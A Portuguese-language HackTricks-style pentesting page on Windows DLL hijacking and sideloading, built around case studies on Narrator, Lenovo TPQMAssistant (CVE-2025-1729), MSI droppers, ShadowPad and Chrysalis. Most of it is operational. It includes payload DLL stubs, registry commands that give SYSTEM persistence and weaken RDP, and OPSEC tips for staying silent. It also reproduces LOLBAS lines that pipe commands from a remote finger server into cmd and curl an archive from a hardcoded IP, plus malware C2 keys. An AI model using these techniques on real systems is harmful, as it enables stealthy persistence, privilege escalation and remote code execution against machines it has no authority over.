#include<windows.h> #include<stdlib.h> #include<stdio.h>

void Entry (){ //Default function that is executed when the DLL is loaded system(“cmd”); }

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call){ case DLL_PROCESS_ATTACH: CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DEATCH: break; } return TRUE; }

</details>

## Estudo de Caso: Narrator OneCore TTS Localization DLL Hijack (Acessibilidade/ATs)

O Windows Narrator.exe ainda verifica uma DLL de localização previsível e específica por idioma na inicialização que pode ser hijacked para execução arbitrária de código e persistência.

Fatos principais
- Caminho verificado (builds atuais): `%windir%\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll` (EN-US).
- Caminho legado (builds mais antigos): `%windir%\System32\speech\engine\tts\msttslocenus.dll`.
- Se uma DLL controlada pelo atacante e gravável existir no caminho OneCore, ela é carregada e `DllMain(DLL_PROCESS_ATTACH)` é executado. Não são necessários exports.

Descoberta com Procmon
- Filtro: `Process Name is Narrator.exe` and `Operation is Load Image` or `CreateFile`.
- Inicie o Narrator e observe a tentativa de carregamento do caminho acima.

DLL mínima
```c
// Build as msttsloc_onecoreenus.dll and place in the OneCore TTS path
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
// Optional OPSEC: DisableThreadLibraryCalls(h);
// Suspend/quiet Narrator main thread, then run payload
// (see PoC for implementation details)
}
return TRUE;
}

OPSEC silence

• A naive hijack vai falar/destacar a UI. Para permanecer silencioso, ao anexar enumere as threads do Narrator, abra a thread principal (OpenThread(THREAD_SUSPEND_RESUME)) e SuspendThread nela; continue em sua própria thread. Veja o PoC para o código completo.

Trigger and persistence via Accessibility configuration

• User context (HKCU): reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Winlogon/SYSTEM (HKLM): reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Com o acima, iniciar o Narrator carrega a DLL plantada. No secure desktop (logon screen), pressione CTRL+WIN+ENTER para iniciar o Narrator; sua DLL é executada como SYSTEM no secure desktop.

RDP-triggered SYSTEM execution (lateral movement)

• Allow classic RDP security layer: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
• RDP para o host, na tela de logon pressione CTRL+WIN+ENTER para lançar o Narrator; sua DLL é executada como SYSTEM no secure desktop.
• A execução para quando a sessão RDP é encerrada—injete/migre prontamente.

Bring Your Own Accessibility (BYOA)

• Você pode clonar uma entrada de registro de um Accessibility Tool (AT) embutido (por exemplo, CursorIndicator), editá-la para apontar para um binário/DLL arbitrário, importá-la e então definir configuration para esse nome de AT. Isso proxya execução arbitrária via framework Accessibility.

Notes

• Escrever em %windir%\System32 e alterar valores em HKLM requer privilégios de administrador.
• Toda a lógica do payload pode residir em DLL_PROCESS_ATTACH; não são necessários exports.

Case Study: CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe

This case demonstrates Phantom DLL Hijacking in Lenovo’s TrackPoint Quick Menu (TPQMAssistant.exe), tracked as CVE-2025-1729.

Vulnerability Details

• Componente: TPQMAssistant.exe localizado em C:\ProgramData\Lenovo\TPQM\Assistant\.
• Tarefa Agendada: Lenovo\TrackPointQuickMenu\Schedule\ActivationDailyScheduleTask executa diariamente às 9:30 AM sob o contexto do usuário logado.
• Permissões do diretório: Gravável por CREATOR OWNER, permitindo que usuários locais deixem arquivos arbitrários.
• DLL Search Behavior: Tenta carregar hostfxr.dll a partir do seu diretório de trabalho primeiro e registra “NAME NOT FOUND” se ausente, indicando precedência de busca no diretório local.

Exploit Implementation

Um atacante pode colocar um stub malicioso hostfxr.dll no mesmo diretório, explorando a DLL ausente para obter execução de código no contexto do usuário:

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Payload: display a message box (proof-of-concept)
MessageBoxA(NULL, "DLL Hijacked!", "TPQM", MB_OK);
}
return TRUE;
}

Fluxo de Ataque

1. Como usuário padrão, coloque hostfxr.dll em C:\ProgramData\Lenovo\TPQM\Assistant\.
2. Aguarde a tarefa agendada ser executada às 9:30 sob o contexto do usuário atual.
3. Se um administrador estiver conectado quando a tarefa for executada, a DLL maliciosa roda na sessão do administrador com integridade média.
4. Encadeie técnicas padrão de bypass de UAC para elevar de integridade média para privilégios SYSTEM.

Estudo de Caso: MSI CustomAction Dropper + DLL Side-Loading via Signed Host (wsc_proxy.exe)

Atores de ameaça frequentemente emparelham droppers baseados em MSI com DLL side-loading para executar payloads sob um processo confiável e assinado.

Chain overview

• O usuário baixa o MSI. Uma CustomAction é executada silenciosamente durante a instalação GUI (por ex., LaunchApplication ou uma ação VBScript), reconstruindo a próxima etapa a partir de recursos incorporados.
• O dropper grava um EXE legítimo e assinado e uma DLL maliciosa no mesmo diretório (par de exemplo: Avast-assinado wsc_proxy.exe + wsc.dll controlada pelo atacante).
• Quando o EXE assinado é iniciado, a ordem de procura de DLLs do Windows carrega wsc.dll do diretório de trabalho primeiro, executando o código do atacante sob um pai assinado (ATT&CK T1574.001).

MSI analysis (what to look for)

• Tabela CustomAction:
• Procure entradas que executem executáveis ou VBScript. Padrão suspeito de exemplo: LaunchApplication executando um arquivo incorporado em segundo plano.
• No Orca (Microsoft Orca.exe), inspecione as tabelas CustomAction, InstallExecuteSequence e Binary.
• Payloads incorporados/fragmentados no CAB do MSI:
• Administrative extract: msiexec /a package.msi /qb TARGETDIR=C:\out
• Or use lessmsi: lessmsi x package.msi C:\out
• Procure por múltiplos pequenos fragmentos que são concatenados e descriptografados por uma CustomAction VBScript. Fluxo comum:

' VBScript CustomAction (high level)
' 1) Read multiple fragment files from the embedded CAB (e.g., f0.bin, f1.bin, ...)
' 2) Concatenate with ADODB.Stream or FileSystemObject
' 3) Decrypt using a hardcoded password/key
' 4) Write reconstructed PE(s) to disk (e.g., wsc_proxy.exe and wsc.dll)

Sideloading prático com wsc_proxy.exe

• Coloque estes dois arquivos na mesma pasta:
• wsc_proxy.exe: host legítimo assinado (Avast). O processo tenta carregar wsc.dll pelo nome a partir do seu diretório.
• wsc.dll: DLL do atacante. Se não forem necessários exports específicos, DllMain pode ser suficiente; caso contrário, construa uma proxy DLL e encaminhe os exports necessários para a biblioteca genuína enquanto executa o payload em DllMain.
• Construa um payload DLL mínimo:

// x64: x86_64-w64-mingw32-gcc payload.c -shared -o wsc.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
WinExec("cmd.exe /c whoami > %TEMP%\\wsc_sideload.txt", SW_HIDE);
}
return TRUE;
}

• Para requisitos de exportação, use um framework de proxy (por exemplo, DLLirant/Spartacus) para gerar um forwarding DLL que também execute seu payload.

• Esta técnica depende da resolução de nomes de DLL pelo binário hospedeiro. Se o host usar caminhos absolutos ou flags de carregamento seguro (por exemplo, LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories), o hijack pode falhar.

• KnownDLLs, SxS, and forwarded exports podem influenciar a precedência e devem ser considerados ao selecionar o binário host e o export set.

Signed triads + encrypted payloads (ShadowPad case study)

Check Point descreveu como o Ink Dragon implanta ShadowPad usando uma tríade de três arquivos para se misturar com software legítimo enquanto mantém o payload principal criptografado no disco:

1. Signed host EXE – fornecedores como AMD, Realtek, ou NVIDIA são abusados (vncutil64.exe, ApplicationLogs.exe, msedge_proxyLog.exe). Os atacantes renomeiam o executável para parecer um binário do Windows (por exemplo conhost.exe), mas a assinatura Authenticode permanece válida.
2. Malicious loader DLL – depositada ao lado do EXE com um nome esperado (vncutil64loc.dll, atiadlxy.dll, msedge_proxyLogLOC.dll). A DLL costuma ser um binário MFC ofuscado com o framework ScatterBrain; sua única função é localizar o blob criptografado, descriptografá-lo e reflectively map ShadowPad.
3. Encrypted payload blob – frequentemente armazenado como <name>.tmp no mesmo diretório. Após mapear na memória o payload descriptografado, o loader exclui o arquivo TMP para destruir evidências forenses.

Tradecraft notes:

• Renomear o EXE assinado (mantendo o OriginalFileName original no cabeçalho PE) permite que ele se passe por um binário do Windows e ainda retenha a assinatura do fornecedor, então replique o hábito do Ink Dragon de deixar binários com aparência de conhost.exe que na verdade são utilitários AMD/NVIDIA.
• Porque o executável permanece confiável, a maioria dos controles de allowlisting normalmente precisa apenas que sua DLL maliciosa esteja ao lado dele. Foque em customizar a loader DLL; o pai assinado tipicamente pode rodar sem alterações.
• O decryptor do ShadowPad espera que o blob TMP esteja ao lado do loader e gravável para que ele possa zerar o arquivo após o mapeamento. Mantenha o diretório gravável até o payload carregar; uma vez em memória o arquivo TMP pode ser excluído com segurança para OPSEC.

LOLBAS stager + staged archive sideloading chain (finger → tar/curl → WMI)

Os operadores combinam DLL sideloading com LOLBAS para que o único artefato customizado no disco seja a DLL maliciosa ao lado do EXE confiável:

• Remote command loader (Finger): PowerShell oculto cria cmd.exe /c, puxa comandos de um Finger server e os direciona para cmd:

powershell.exe Start-Process cmd -ArgumentList '/c finger Galo@91.193.19.108 | cmd' -WindowStyle Hidden

• finger user@host puxa texto TCP/79; | cmd executa a resposta do servidor, permitindo que os operadores rotacionem o segundo estágio do lado do servidor.

• Built-in download/extract: Baixe um arquivo com uma extensão benigna, descompacte-o e coloque o alvo de sideload mais a DLL em um diretório aleatório em %LocalAppData%:

$base = "$Env:LocalAppData"; $dir = Join-Path $base (Get-Random); curl -s -L -o "$dir.pdf" 79.141.172.212/tcp; mkdir "$dir"; tar -xf "$dir.pdf" -C "$dir"; $exe = "$dir\intelbq.exe"

• curl -s -L oculta progresso e segue redirects; tar -xf usa o tar embutido do Windows.

• WMI/CIM launch: Inicie o EXE via WMI para que a telemetria mostre um processo criado por CIM enquanto ele carrega a DLL colocada ao lado:

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = "`"$exe`""}

• Funciona com binários que preferem DLLs locais (por exemplo, intelbq.exe, nearby_share.exe); o payload (por exemplo, Remcos) executa sob o nome confiável.

• Hunting: Acione alertas em forfiles quando /p, /m, e /c aparecem juntos; é incomum fora de scripts administrativos.

Case Study: NSIS dropper + Bitdefender Submission Wizard sideload (Chrysalis)

Uma intrusão recente do Lotus Blossom abusou de uma cadeia de atualização confiável para entregar um dropper empacotado com NSIS que estagiou um DLL sideload além de payloads totalmente em memória.

Tradecraft flow

• update.exe (NSIS) cria %AppData%\Bluetooth, marca o diretório como HIDDEN, dropa um Bitdefender Submission Wizard renomeado BluetoothService.exe, um log.dll malicioso e um blob criptografado BluetoothService, e então lança o EXE.
• O EXE host importa log.dll e chama LogInit/LogWrite. LogInit mmap-loads o blob; LogWrite o descriptografa com um stream customizado baseado em LCG (constantes 0x19660D / 0x3C6EF35F, material de chave derivado de um hash anterior), sobrescreve o buffer com shellcode em plaintext, libera temporários e salta para ele.
• Para evitar uma IAT, o loader resolve APIs hasheando nomes de export usando FNV-1a basis 0x811C9DC5 + prime 0x1000193, então aplicando uma avalanche estilo Murmur (0x85EBCA6B) e comparando contra hashes alvo salteados.

Main shellcode (Chrysalis)

• Descriptografa um módulo principal estilo PE repetindo add/XOR/sub com a chave gQ2JR&9; por cinco passagens, então carrega dinamicamente Kernel32.dll → GetProcAddress para completar a resolução de imports.
• Reconstrói strings de nomes de DLL em tempo de execução via transformações por caractere de bit-rotate/XOR, então carrega oleaut32, advapi32, shlwapi, user32, wininet, ole32, shell32.
• Usa um segundo resolvedor que percorre a PEB → InMemoryOrderModuleList, analisa cada tabela de export em blocos de 4 bytes com mistura estilo Murmur, e só recorre a GetProcAddress se o hash não for encontrado.

Embedded configuration & C2

• A config vive dentro do arquivo BluetoothService dropado no offset 0x30808 (tamanho 0x980) e é RC4-decryptada com a chave qwhvb^435h&*7, revelando a URL do C2 e o User-Agent.
• Beacons constroem um perfil do host delimitado por pontos, prefixam a tag 4Q, então RC4-encryptam com a chave vAuig34%^325hGV antes de HttpSendRequestA sobre HTTPS. Respostas são RC4-decryptadas e despachadas por um switch de tags (4T shell, 4V exec de processo, 4W/4X escrita de arquivo, 4Y leitura/exfil, 4\\ desinstalação, 4 enum de drive/arquivo + casos de transferência em chunks).
• O modo de execução é controlado por args de CLI: sem args = instalar persistência (service/Run key) apontando para -i; -i relança a si mesmo com -k; -k pula a instalação e executa o payload.

Alternate loader observed

• A mesma intrusão dropou Tiny C Compiler e executou svchost.exe -nostdlib -run conf.c de C:\ProgramData\USOShared\, com libtcc.dll ao lado. O código C fornecido pelo atacante embedia shellcode, compilou e executou em memória sem tocar no disco com um PE. Replicar com:

C:\ProgramData\USOShared\tcc.exe -nostdlib -run conf.c

• Esta etapa compile-and-run baseada em TCC importou Wininet.dll em tempo de execução e baixou um shellcode de segunda etapa de um hardcoded URL, fornecendo um loader flexível que se passa por uma execução de compilador run.

References

• Red Canary – Intelligence Insights: January 2026
• CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
• Microsoft Store - TPQM Assistant UWP
• https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e
• https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
• Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe
• TrustedSec – Hack-cessibility: When DLL Hijacks Meet Windows Helpers
• PoC – api0cradle/Narrator-dll
• Sysinternals Process Monitor
• Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT
• Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation
• Rapid7 – The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit
• 0xdf – HTB Bruno ZipSlip → DLL hijack chain

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

• Confira os planos de assinatura!
• Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
• Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.